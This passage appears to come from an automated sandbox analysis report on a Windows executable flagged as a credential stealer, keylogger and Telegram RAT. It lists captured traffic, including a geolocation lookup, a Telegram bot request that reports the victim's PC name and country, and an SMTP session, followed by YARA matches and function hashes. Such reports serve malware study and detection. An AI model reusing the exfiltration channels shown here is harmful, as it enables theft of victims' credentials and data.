6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.8	49724	104.21.112.1	443	3352	C:\Users\user\Desktop\YDg44STseR.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-11 01:42:30 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2025-01-11 01:42:30 UTC	855	IN	HTTP/1.1 200 OK Date: Sat, 11 Jan 2025 01:42:30 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1874539 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KM0pZUuaMiadEGCuZo7b4z2QIwY3kgRCBCJZ9iamvhyorWGyQ52rAY%2BpYc5MHnNuKGqhYqKf2Hcf6kEdCJmXHcD%2BXACaT53BouvQ07GvwS%2FWahK4gPZdmiQ5y1D4u4ACy9amKC6x"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 900135e84968424b-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1558&min_rtt=1545&rtt_var=606&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1768625&cwnd=248&unsent_bytes=0&cid=94d5ae8801daac48&ts=148&x=0"
2025-01-11 01:42:30 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.8	49725	149.154.167.220	443	3352	C:\Users\user\Desktop\YDg44STseR.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-11 01:42:31 UTC	349	OUT	GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:377142%0D%0ADate%20and%20Time:%2011/01/2025%20/%2015:29:58%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20377142%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1 Host: api.telegram.org Connection: Keep-Alive
2025-01-11 01:42:31 UTC	344	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 Date: Sat, 11 Jan 2025 01:42:31 GMT Content-Type: application/json Content-Length: 55 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2025-01-11 01:42:31 UTC	55	IN	Data Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}

SMTP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP	Commands
Jan 11, 2025 02:42:39.114368916 CET	587	49726	66.29.146.57	192.168.2.8	220-premium230.web-hosting.com ESMTP Exim 4.96.2 #2 Fri, 10 Jan 2025 20:42:39 -0500 220-We do not authorize the use of this system to transport unsolicited, 220 and/or bulk e-mail.
Jan 11, 2025 02:42:39.114581108 CET	49726	587	192.168.2.8	66.29.146.57	EHLO 377142
Jan 11, 2025 02:42:39.277342081 CET	587	49726	66.29.146.57	192.168.2.8	250-premium230.web-hosting.com Hello 377142 [8.46.123.189] 250-SIZE 52428800 250-8BITMIME 250-PIPELINING 250-PIPECONNECT 250-STARTTLS 250 HELP
Jan 11, 2025 02:42:39.277643919 CET	49726	587	192.168.2.8	66.29.146.57	STARTTLS
Jan 11, 2025 02:42:39.443591118 CET	587	49726	66.29.146.57	192.168.2.8	220 TLS go ahead

Target ID:	0
Start time:	20:42:09
Start date:	10/01/2025
Path:	C:\Users\user\Desktop\YDg44STseR.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\YDg44STseR.exe"
Imagebase:	0x400000
File size:	208'384 bytes
MD5 hash:	7455FA9CB790ABA2A0B149337CD0629A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.2680443700.0000000005120000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 00000000.00000002.2680443700.0000000005120000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000000.00000002.2680443700.0000000005120000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000000.00000002.2680443700.0000000005120000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000000.00000002.2680443700.0000000005120000.00000004.08000000.00040000.00000000.sdmp, Author: unknown Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 00000000.00000002.2680443700.0000000005120000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth Rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook, Description: Detects executables with potential process hoocking, Source: 00000000.00000002.2680443700.0000000005120000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.2678663103.0000000003673000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1418921839.00000000005DA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000000.00000003.1418921839.00000000005DA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000000.00000003.1418921839.00000000005DA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.2677196873.0000000002590000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 00000000.00000002.2677196873.0000000002590000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000000.00000002.2677196873.0000000002590000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000000.00000002.2677196873.0000000002590000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000000.00000003.1418921839.00000000005DA000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.2676859818.000000000221F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000000.00000002.2676859818.000000000221F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000000.00000002.2676859818.000000000221F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000000.00000002.2677264082.00000000025F1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000000.00000002.2677196873.0000000002590000.00000004.08000000.00040000.00000000.sdmp, Author: unknown Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 00000000.00000002.2677196873.0000000002590000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000000.00000002.2676859818.000000000221F000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook, Description: Detects executables with potential process hoocking, Source: 00000000.00000002.2677196873.0000000002590000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
Reputation:	low
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	8.1%
Dynamic/Decrypted Code Coverage:	48.8%
Signature Coverage:	30.8%
Total number of Nodes:	416
Total number of Limit Nodes:	33

Executed Functions

Function 004019F0 Relevance: 146.0, APIs: 34, Strings: 49, Instructions: 747
comprocessCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

OleInitialize.OLE32(00000000), ref: 004019FD
_getenv.LIBCMT ref: 00401ABA
GetCurrentProcessId.KERNEL32 ref: 00401ACD
CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 00401AD6
Module32First.KERNEL32 ref: 00401C48
CloseHandle.KERNEL32(00000000,?,?,00000008,00000000), ref: 00401C9D
Module32Next.KERNEL32(00000000,?), ref: 00401D02
Module32Next.KERNEL32(00000000,?), ref: 00401DB6
CloseHandle.KERNEL32(00000000), ref: 00401DC4
GetModuleHandleA.KERNEL32(00000000), ref: 00401DCB
FindResourceA.KERNEL32(00000000,00000000,00000008), ref: 00401E90
LoadResource.KERNEL32(00000000,00000000), ref: 00401E9E
LockResource.KERNEL32(00000000), ref: 00401EA7
SizeofResource.KERNEL32(00000000,00000000), ref: 00401EB3
_malloc.LIBCMT ref: 00401EBA
_memset.LIBCMT ref: 00401EDD
SizeofResource.KERNEL32(00000000,?), ref: 00401F02

Strings

., xrefs: 00401B0A
5, xrefs: 00402109
8, xrefs: 00401BA9
h, xrefs: 00401A6F
{, xrefs: 00401B4B
v, xrefs: 00401B5A
x, xrefs: 00401E69
!, xrefs: 0040201A
W, xrefs: 00402033
%, xrefs: 004020FA
W, xrefs: 00401B14
0, xrefs: 00401BBD
", xrefs: 00401B0F
*, xrefs: 00401A1F
V, xrefs: 00401E19
v, xrefs: 00401E4B
[, xrefs: 00402047
v, xrefs: 0040212C
!, xrefs: 00401B1E
o, xrefs: 00401B8D
6, xrefs: 004020C5
W, xrefs: 00401B23
o, xrefs: 00402159
o, xrefs: 00402097
{, xrefs: 0040205B
4, xrefs: 00401B64
W, xrefs: 004020E6
), xrefs: 0040202E
4, xrefs: 00402136
___, xrefs: 0040227D
v, xrefs: 0040206A
!, xrefs: 004020CF
x, xrefs: 00401B78
., xrefs: 0040201F
x, xrefs: 00402088
U, xrefs: 004020F5
_._, xrefs: 00402257
V, xrefs: 00402038
:, xrefs: 00401B28
[, xrefs: 00401B37
{, xrefs: 00401E3C
{, xrefs: 0040211D
*, xrefs: 004020E1
4, xrefs: 00402074
D, xrefs: 00401DFB
E, xrefs: 00401E0F
x, xrefs: 0040214A
', xrefs: 00401AF6
', xrefs: 00402006

Memory Dump Source

Source File: 00000000.00000002.2675699764.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2675677842.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2675727533.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2675750699.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2675750699.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2675750699.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2675823153.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_YDg44STseR.jbxd

Similarity

API ID: Resource$HandleModule32$CloseNextSizeof$CreateCurrentFindFirstInitializeLoadLockModuleProcessSnapshotToolhelp32_getenv_malloc_memset
String ID: !$!$!$"$%$'$'$)$*$*$.$.$0$4$4$4$5$6$8$:$D$E$U$V$V$W$W$W$W$[$[$_._$___$h$o$o$o$v$v$v$v$x$x$x$x${${${${
API String ID: 1430744539-2962942730
Opcode ID: f33ec6517a8e462eea4e7ce496cce69d106849ef0d44fd50fc6c48668fb332a6
Instruction ID: 7b7814addfdf4b3cbdaef5ede101091f5fb3e94df766619d88950efa0d528cfd
Opcode Fuzzy Hash: f33ec6517a8e462eea4e7ce496cce69d106849ef0d44fd50fc6c48668fb332a6
Instruction Fuzzy Hash: B3628C2100C7C19EC321DB388888A5FBFE55FA6328F484A5DF1E55B2E2C7799509C76B

Function 061C52A8 Relevance: 4.3, Strings: 1, Instructions: 3071COMMON

Download Yara Rule

Strings

N, xrefs: 061C868B

Memory Dump Source

Source File: 00000000.00000002.2681315845.00000000061C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_61c0000_YDg44STseR.jbxd

Similarity

API ID:
String ID: N
API String ID: 0-1130791706
Opcode ID: cafbc7e58b48b816e4138bc2483cecaef1e1397711e5c3a6b3e218872a922f1d
Instruction ID: 67780c46f058c0b8991895f07d6552dd8b7922a82e47a315cd4a4b70aecc437e
Opcode Fuzzy Hash: cafbc7e58b48b816e4138bc2483cecaef1e1397711e5c3a6b3e218872a922f1d
Instruction Fuzzy Hash: 0F73E431D10B5A8EDB11EF68C854A9DF7B1FF99310F11C69AE44867261EB70AAC4CF81

Function 061C9EA8 Relevance: 3.5, Strings: 1, Instructions: 2268COMMON

Download Yara Rule

Strings

K, xrefs: 061CC57E

Memory Dump Source

Source File: 00000000.00000002.2681315845.00000000061C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_61c0000_YDg44STseR.jbxd

Similarity

API ID:
String ID: K
API String ID: 0-856455061
Opcode ID: b934ae4ca2245a01ded44391e129ba9835cdeb99f461f78da91c3d160cb08049
Instruction ID: 2a9226e9feec907d3c2022d077404d5664b4ee22283f6e722fe4603cead0f12c
Opcode Fuzzy Hash: b934ae4ca2245a01ded44391e129ba9835cdeb99f461f78da91c3d160cb08049
Instruction Fuzzy Hash: 0533E430C146198EDB61EF68C854A9DF7B1FF99310F10D69AE44CA7261EB70AAC5CF81

Function 061C97D8 Relevance: 1.9, APIs: 1, Instructions: 359
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.2681315845.00000000061C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_61c0000_YDg44STseR.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8afc05cc6d5a3832ad15c9f896e4aa08dd5c6863dbe51e520434f3be190030b5
Instruction ID: 57c601f313a7f425e35e0ef3b6445fad130d8397de2e163278b6e0a63c248035
Opcode Fuzzy Hash: 8afc05cc6d5a3832ad15c9f896e4aa08dd5c6863dbe51e520434f3be190030b5
Instruction Fuzzy Hash: 98F1E574E00218CFDB64DFA9C884B9DBBB2BF88314F5485A9E448AB355DB319986CF50

Function 02142EF8 Relevance: 1.2, Instructions: 1203COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2676669397.0000000002140000.00000040.00000800.00020000.00000000.sdmp, Offset: 02140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2140000_YDg44STseR.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9fa47f2bdcfb19e1b387e5e46fcd1f787a57968c07340ffafd430cf489430a17
Instruction ID: 13e2c7d86d0544cdfab7fe8ab588e7dc4b7cd84652a615806df91d0af64ec0a5
Opcode Fuzzy Hash: 9fa47f2bdcfb19e1b387e5e46fcd1f787a57968c07340ffafd430cf489430a17
Instruction Fuzzy Hash: 7C92B2B29441868FCB368E7884D32DABBB37F9B32876D06D5C0945B016EB349587CF91

Function 065D5E50 Relevance: 1.1, Instructions: 1115COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2681615837.00000000065D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_65d0000_YDg44STseR.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1bcb382f5b2870af87db0b5403a9c13ced6f3401832d7d6074d21f877a88c1be
Instruction ID: 1ae30fbfc6db57dc689dd675cb709b9d6ad20652f85ea39a7f0990c1e88c6c36
Opcode Fuzzy Hash: 1bcb382f5b2870af87db0b5403a9c13ced6f3401832d7d6074d21f877a88c1be
Instruction Fuzzy Hash: C5C2B674A01229CFDB64DF24C998BADBBB2FB89301F5045E9D809A7364DB319E85DF40

Function 0214A598 Relevance: .9, Instructions: 894COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2676669397.0000000002140000.00000040.00000800.00020000.00000000.sdmp, Offset: 02140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2140000_YDg44STseR.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2d390b547ef3b80f5461461f03e36cf00f18994e8df08aed630b7000cdbbf9e5
Instruction ID: 569226e1402263d1b3d228e3c44002863657362d9175c616a499626f02c4856e
Opcode Fuzzy Hash: 2d390b547ef3b80f5461461f03e36cf00f18994e8df08aed630b7000cdbbf9e5
Instruction Fuzzy Hash: 6582B371A80209CFCB15CF68C5A4AAEBBF2FF88314F168559E419DB361DB31E951CB90

Function 0641E078 Relevance: .7, Instructions: 747COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2681404979.0000000006410000.00000040.00000800.00020000.00000000.sdmp, Offset: 06410000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6410000_YDg44STseR.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f9cb55de736da4c70d11b54ba4433caf1ce8ba4b4dd5c81a079e2a055840c767
Instruction ID: 365c80128dbdf79f8f0c7ca56bd2e599effc991087a4c1f375f2329bb704d247
Opcode Fuzzy Hash: f9cb55de736da4c70d11b54ba4433caf1ce8ba4b4dd5c81a079e2a055840c767
Instruction Fuzzy Hash: C8827074E012288FDBA5DF69C898BDDBBB2BF89300F1081E9990DA7255DB305E85DF44

Function 061C0B30 Relevance: .7, Instructions: 711COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2681315845.00000000061C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_61c0000_YDg44STseR.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9dc0194f42620eb442fbfe87d4e0a953c77b0e300faab30fc1a75a39537625ee
Instruction ID: d33234db2001ffc6e9fd22aea5ca2ff882171d20f1770fac75a2369b8b653156
Opcode Fuzzy Hash: 9dc0194f42620eb442fbfe87d4e0a953c77b0e300faab30fc1a75a39537625ee
Instruction Fuzzy Hash: DB72BB74E012288FDBA4DF69C980BEDBBB2BB59315F1481E9D809A7355DB319E81CF40

Function 065D0040 Relevance: .7, Instructions: 679COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2681615837.00000000065D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_65d0000_YDg44STseR.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e7dc1d37b40a419bfa21c2ca5cb6f2bfff6c846c5f1eb5a83364fccedbeab38b
Instruction ID: d789c6ad9186a348f09a53a1e4cd78c54267d146b6f27e9f5311c9c42103e569
Opcode Fuzzy Hash: e7dc1d37b40a419bfa21c2ca5cb6f2bfff6c846c5f1eb5a83364fccedbeab38b
Instruction Fuzzy Hash: 69727E74E012288FEB65DF69C984BDEBBB2BF89300F1081E9950DA7294DB315E81DF51

Function 02146EA8 Relevance: .5, Instructions: 527COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2676669397.0000000002140000.00000040.00000800.00020000.00000000.sdmp, Offset: 02140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2140000_YDg44STseR.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 00606329c9881fa2370b1007019d43d5471296b1f498825c48c91e4e3ede7361
Instruction ID: afe88b7e3aa7a82fab7ba56c3ffdba7033f26efe5a6fbe4c7b6f0ba269ba20c9
Opcode Fuzzy Hash: 00606329c9881fa2370b1007019d43d5471296b1f498825c48c91e4e3ede7361
Instruction Fuzzy Hash: EC125C70A002198FDB18DF69C854BAEBBF6BFC9304F148569E919DB391DF349942CB90

Function 021474E0 Relevance: .4, Instructions: 446COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2676669397.0000000002140000.00000040.00000800.00020000.00000000.sdmp, Offset: 02140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2140000_YDg44STseR.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7490ec484320a5b5aabb60e74759d1c47e5c22ffb388535974a5556b2f104cb2
Instruction ID: ea5101a433bef93c6ca10b9f3f16b186339f5305c828cfee56995da9a5c812f6
Opcode Fuzzy Hash: 7490ec484320a5b5aabb60e74759d1c47e5c22ffb388535974a5556b2f104cb2
Instruction Fuzzy Hash: 3A025F71A40219DFDB14CF68C984AAEFBF2FF88314F158466E419AB2A1DB30DD52CB50

Function 0214C4E0 Relevance: .4, Instructions: 350COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2676669397.0000000002140000.00000040.00000800.00020000.00000000.sdmp, Offset: 02140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2140000_YDg44STseR.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 725440d0cde5fbd5174b6c569a5848ffd84fe91c856a1dc1b36169f1ada41583
Instruction ID: e8652c71829d5d15991943ef23cb5a9e6ffc57513ae921478c40174938706796
Opcode Fuzzy Hash: 725440d0cde5fbd5174b6c569a5848ffd84fe91c856a1dc1b36169f1ada41583
Instruction Fuzzy Hash: 45E10D75E41218DFDB14CF69C894A9DBBB2FF89310F15D06AE819AB361DB309841CF90

Function 06426078 Relevance: .3, Instructions: 302COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2681430302.0000000006420000.00000040.00000800.00020000.00000000.sdmp, Offset: 06420000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6420000_YDg44STseR.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c75a92f7c4b96b8936ffbc2fc6468590da5ff5dee63dbec5f213685674caece4
Instruction ID: 2d2d0f83a5f9422b7afb66f83d01eb549e16265052b74995ac74dd4f788f5f98
Opcode Fuzzy Hash: c75a92f7c4b96b8936ffbc2fc6468590da5ff5dee63dbec5f213685674caece4
Instruction Fuzzy Hash: 82E1DF74E00228CFEB64DFA5C944B9DBBB2BF89304F2080A9D519AB395DB315E85CF50

Function 063B7FE0 Relevance: .3, Instructions: 298COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2681378909.00000000063B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_63b0000_YDg44STseR.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0897c3992306f25d5ca11197aec5fe1fc96a618604f20e297462024f8ad659be
Instruction ID: d5f5b5f1a74a89ef33c1f2afd24107442a60aefbf940bbe063fe41b5d5a922d4
Opcode Fuzzy Hash: 0897c3992306f25d5ca11197aec5fe1fc96a618604f20e297462024f8ad659be
Instruction Fuzzy Hash: 80E1C074E01218CFEB64DFA5C844BDDBBB2BF89304F2081A9D509AB394DB359A85CF54

Function 064521C0 Relevance: .3, Instructions: 294COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2681506786.0000000006450000.00000040.00000800.00020000.00000000.sdmp, Offset: 06450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6450000_YDg44STseR.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6c632f8983aef123e796f42db45f2ddf7e0a3a6c064076a3e5fb3f752d2c963f
Instruction ID: fef2f28a1513b25d368266e7f280b5262a236196048089b2bf97960a00a24683
Opcode Fuzzy Hash: 6c632f8983aef123e796f42db45f2ddf7e0a3a6c064076a3e5fb3f752d2c963f
Instruction Fuzzy Hash: 86D19274E00218CFDB54DFA5C884B9EBBB2BF89304F5091AAD809AB395DB355E81CF50

Function 06426720 Relevance: .3, Instructions: 294COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2681430302.0000000006420000.00000040.00000800.00020000.00000000.sdmp, Offset: 06420000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6420000_YDg44STseR.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 14279cf532828d652e8c5041887c99492f5557e72ab115f495518ea85595b9c3
Instruction ID: 9db56bc6ae352b232e09e077f037ca6d0f927c317ba13e5a1d297680576de8e7
Opcode Fuzzy Hash: 14279cf532828d652e8c5041887c99492f5557e72ab115f495518ea85595b9c3
Instruction Fuzzy Hash: 4AD19174E01228CFDB54DFA5C884BADBBB2BF89304F6091A9D409AB394DB355E81CF50

Function 064283D0 Relevance: .3, Instructions: 294COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2681430302.0000000006420000.00000040.00000800.00020000.00000000.sdmp, Offset: 06420000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6420000_YDg44STseR.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 059de245ab887b3a00681c876a8f078ffa0ce8fe7645c08a907f6aae93e90299
Instruction ID: e462111e47357400059685329977452a68eaaf08ca586a445be5aaf5b4f492a4
Opcode Fuzzy Hash: 059de245ab887b3a00681c876a8f078ffa0ce8fe7645c08a907f6aae93e90299
Instruction Fuzzy Hash: E6D1A174E00228CFDB54DFA5C894BADBBB2BF89300F6091A9D409AB394DB355E85CF50

Function 063B9418 Relevance: .3, Instructions: 274COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2681378909.00000000063B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_63b0000_YDg44STseR.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 52d75036937014b85e0017d4873afabb4c22924daddd959c33526fc6de15c1be
Instruction ID: 1010944a487973268e64baacdfa1f584ad126553ca3e5432d05c0ebfc2d7f1a4
Opcode Fuzzy Hash: 52d75036937014b85e0017d4873afabb4c22924daddd959c33526fc6de15c1be
Instruction Fuzzy Hash: E1D1AE74E00218CFDB94DFA9C984B9DBBB2BF89301F2090A9D909AB354DB315E85DF51

Function 061CCF30 Relevance: .3, Instructions: 270COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2681315845.00000000061C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_61c0000_YDg44STseR.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8fb033b4b5f789fde36e5baee922e99df036bcd23ae7112bae988a027417ea4b
Instruction ID: 3031a66c584a6b6c8817d88910f21c6667bc52c30ea2030ecad92b76cab8a8cd
